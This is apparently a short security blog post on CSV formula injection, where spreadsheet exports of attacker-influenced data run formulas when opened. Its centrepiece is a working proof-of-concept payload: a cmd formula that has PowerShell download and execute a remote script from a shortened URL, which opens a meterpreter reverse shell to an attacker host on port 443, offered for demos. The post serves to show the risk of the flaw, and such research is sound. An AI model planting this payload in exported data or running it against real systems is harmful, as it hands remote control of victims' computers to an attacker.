From CSV to Meterpreter

As many of you have probably seen, last year Context published research into spreadsheet applications such as Excel which render CSV files (and their embedded formula) when opened. If you haven’t, I suggest stopping and reading http://www.contextis.com/resources/blog/comma-separated-vulnerabilities/

Many web applications provide a user with an option to export data to a CSV file format, and when the data can be influenced by an attacker (registration names, analytics etc), you are facing a potentially dangerous combination.

To highlight the risk of such a vulnerability, sometimes popping calc.exe isn’t enough, and nothing quantifies risk quite like a meterpreter shell ;)

With that, I created a quick POC which leverages Powershell and Powersploit to generate a meterpreter reverse connection to an attacker IP:

=cmd|'/C powershell IEX(wget bit.ly/1X146m3)'!A0

This was created to be as small as possible (due to length limitations on many of the CSV fields I have tested in the past) and requires the ‘wget’ cmdlet on Powershell 3 to function.

This works by downloading and executing a copy of invoke-shellcode.ps1 which will attempt to connect a meterpreter reverse shell to meterpreter.local on port 443 when called, perfect for a demo to show off your CSV pwning skills.